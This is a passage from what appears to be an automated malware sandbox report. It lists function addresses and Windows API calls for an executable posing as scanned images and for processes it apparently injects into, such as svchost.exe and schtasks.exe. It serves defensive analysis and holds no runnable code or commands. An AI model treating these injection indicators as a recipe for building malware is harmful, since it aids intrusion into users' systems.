            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF35C0 NtCreateMutant,LdrInitializeThunk,9_2_02EF35C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF39B0 NtGetContextThread,LdrInitializeThunk,9_2_02EF39B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2AB0 NtWaitForSingleObject,9_2_02EF2AB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2BE0 NtQueryValueKey,9_2_02EF2BE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2BF0 NtAllocateVirtualMemory,9_2_02EF2BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2BA0 NtEnumerateValueKey,9_2_02EF2BA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2B80 NtQueryInformationFile,9_2_02EF2B80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2EA0 NtAdjustPrivilegesToken,9_2_02EF2EA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2E80 NtReadVirtualMemory,9_2_02EF2E80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2E30 NtWriteVirtualMemory,9_2_02EF2E30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2FA0 NtQuerySection,9_2_02EF2FA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2F90 NtProtectVirtualMemory,9_2_02EF2F90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2F60 NtCreateProcessEx,9_2_02EF2F60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2CF0 NtOpenProcess,9_2_02EF2CF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2CC0 NtQueryVirtualMemory,9_2_02EF2CC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2C00 NtQueryInformationProcess,9_2_02EF2C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2DB0 NtEnumerateKey,9_2_02EF2DB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF2D00 NtSetInformationFile,9_2_02EF2D00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF3090 NtSetValueKey,9_2_02EF3090
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF3010 NtOpenDirectoryObject,9_2_02EF3010
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF3D70 NtOpenThread,9_2_02EF3D70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF3D10 NtOpenProcessToken,9_2_02EF3D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026D7AA0 NtReadFile,9_2_026D7AA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026D7B90 NtDeleteFile,9_2_026D7B90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026D7940 NtCreateFile,9_2_026D7940
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026D7C30 NtClose,9_2_026D7C30
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A840B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00A840B1
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A78858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A78858
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00A8545F
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A2E8000_2_00A2E800
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4DBB50_2_00A4DBB5
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A2E0600_2_00A2E060
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00AA804A0_2_00AA804A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A341400_2_00A34140
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A424050_2_00A42405
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A565220_2_00A56522
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00AA06650_2_00AA0665
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A5267E0_2_00A5267E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4283A0_2_00A4283A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A368430_2_00A36843
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A589DF0_2_00A589DF
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A56A940_2_00A56A94
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00AA0AE20_2_00AA0AE2
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A38A0E0_2_00A38A0E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A7EB070_2_00A7EB07
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A88B130_2_00A88B13
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4CD610_2_00A4CD61
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A570060_2_00A57006
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A331900_2_00A33190
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A3710E0_2_00A3710E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A212870_2_00A21287
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A433C70_2_00A433C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4F4190_2_00A4F419
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A356800_2_00A35680
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A416C40_2_00A416C4
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A358C00_2_00A358C0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A478D30_2_00A478D3
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A41BB80_2_00A41BB8
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A59D050_2_00A59D05
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A2FE400_2_00A2FE40
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A4BFE60_2_00A4BFE6
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A41FD00_2_00A41FD0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_016936000_2_01693600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02122A502_2_02122A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02122A492_2_02122A49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021233E02_2_021233E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0212109D2_2_0212109D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021210A02_2_021210A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021300E32_2_021300E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0212E1632_2_0212E163
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02122EB02_2_02122EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0212FEBB2_2_0212FEBB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0212FEC32_2_0212FEC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0214D6E32_2_0214D6E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021367D32_2_021367D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021227D02_2_021227D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021367CE2_2_021367CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC02C02_2_02DC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE02742_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E003E62_2_02E003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F02_2_02D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFA3522_2_02DFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD20002_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF81CC2_2_02DF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E001AA2_2_02E001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF41A22_2_02DF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC81582_2_02DC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA1182_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D301002_2_02D30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5C6E02_2_02D5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3C7C02_2_02D3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D647502_2_02D64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D407702_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEE4F62_2_02DEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF24462_2_02DF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE44202_2_02DE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E005912_2_02E00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D405352_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA802_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF6BD72_2_02DF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFAB402_2_02DFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E8F02_2_02D6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D268B82_2_02D268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4A8402_2_02D4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D428402_2_02D42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E0A9A62_2_02E0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D429A02_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D569622_2_02D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFEEDB2_2_02DFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D52E902_2_02D52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFCE932_2_02DFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40E592_2_02D40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFEE262_2_02DFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32FC82_2_02D32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4CFE02_2_02D4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBEFA02_2_02DBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4F402_2_02DB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60F302_2_02D60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE2F302_2_02DE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D82F282_2_02D82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30CF22_2_02D30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0CB52_2_02DE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40C002_2_02D40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3ADE02_2_02D3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D58DBF2_2_02D58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDCD1F2_2_02DDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4AD002_2_02D4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5B2C02_2_02D5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE12ED2_2_02DE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D452A02_2_02D452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D8739A2_2_02D8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2D34C2_2_02D2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF132D2_2_02DF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEF0CC2_2_02DEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D470C02_2_02D470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF70E92_2_02DF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFF0E02_2_02DFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4B1B02_2_02D4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E0B16B2_2_02E0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2F1722_2_02D2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7516C2_2_02D7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF16CC2_2_02DF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D856302_2_02D85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFF7B02_2_02DFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D314602_2_02D31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFF43F2_2_02DFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E095C32_2_02E095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDD5B02_2_02DDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF75712_2_02DF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEDAC62_2_02DEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDDAAC2_2_02DDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D85AA02_2_02D85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE1AA32_2_02DE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFA492_2_02DFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF7A462_2_02DF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB3A6C2_2_02DB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB5BF02_2_02DB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7DBF92_2_02D7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5FB802_2_02D5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFB762_2_02DFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D438E02_2_02D438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAD8002_2_02DAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D499502_2_02D49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5B9502_2_02D5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD59102_2_02DD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D49EB02_2_02D49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D03FD22_2_02D03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D03FD52_2_02D03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D41F922_2_02D41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFFB12_2_02DFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFF092_2_02DFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFFCF22_2_02DFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB9C322_2_02DB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5FDC02_2_02D5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF1D5A2_2_02DF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D43D402_2_02D43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF7D732_2_02DF7D73
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_0322FB3B8_2_0322FB3B
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_0322FB408_2_0322FB40
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032292288_2_03229228
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032292308_2_03229230
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_03246A508_2_03246A50
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032294508_2_03229450
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032274D08_2_032274D0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F402C09_2_02F402C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F602749_2_02F60274
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ECE3F09_2_02ECE3F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F803E69_2_02F803E6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7A3529_2_02F7A352
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F520009_2_02F52000
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F781CC9_2_02F781CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F801AA9_2_02F801AA
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F741A29_2_02F741A2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F481589_2_02F48158
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EB01009_2_02EB0100
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F5A1189_2_02F5A118
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EDC6E09_2_02EDC6E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EBC7C09_2_02EBC7C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC07709_2_02EC0770
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EE47509_2_02EE4750
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F6E4F69_2_02F6E4F6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F724469_2_02F72446
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F644209_2_02F64420
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F805919_2_02F80591
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC05359_2_02EC0535
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EBEA809_2_02EBEA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F76BD79_2_02F76BD7
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7AB409_2_02F7AB40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EEE8F09_2_02EEE8F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EA68B89_2_02EA68B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ECA8409_2_02ECA840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC28409_2_02EC2840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC29A09_2_02EC29A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F8A9A69_2_02F8A9A6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ED69629_2_02ED6962
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7EEDB9_2_02F7EEDB
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7CE939_2_02F7CE93
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ED2E909_2_02ED2E90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC0E599_2_02EC0E59
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7EE269_2_02F7EE26
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ECCFE09_2_02ECCFE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EB2FC89_2_02EB2FC8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F3EFA09_2_02F3EFA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F34F409_2_02F34F40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F62F309_2_02F62F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F02F289_2_02F02F28
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EE0F309_2_02EE0F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EB0CF29_2_02EB0CF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F60CB59_2_02F60CB5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC0C009_2_02EC0C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EBADE09_2_02EBADE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ED8DBF9_2_02ED8DBF
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F5CD1F9_2_02F5CD1F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ECAD009_2_02ECAD00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F612ED9_2_02F612ED
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EDB2C09_2_02EDB2C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC52A09_2_02EC52A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F0739A9_2_02F0739A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EAD34C9_2_02EAD34C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7132D9_2_02F7132D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7F0E09_2_02F7F0E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F770E99_2_02F770E9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC70C09_2_02EC70C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F6F0CC9_2_02F6F0CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02ECB1B09_2_02ECB1B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EF516C9_2_02EF516C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F8B16B9_2_02F8B16B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EAF1729_2_02EAF172
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F716CC9_2_02F716CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F056309_2_02F05630
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7F7B09_2_02F7F7B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EB14609_2_02EB1460
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7F43F9_2_02F7F43F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F895C39_2_02F895C3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F5D5B09_2_02F5D5B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F775719_2_02F77571
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F6DAC69_2_02F6DAC6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F05AA09_2_02F05AA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F61AA39_2_02F61AA3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F5DAAC9_2_02F5DAAC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F33A6C9_2_02F33A6C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F77A469_2_02F77A46
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FA499_2_02F7FA49
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F35BF09_2_02F35BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EFDBF99_2_02EFDBF9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EDFB809_2_02EDFB80
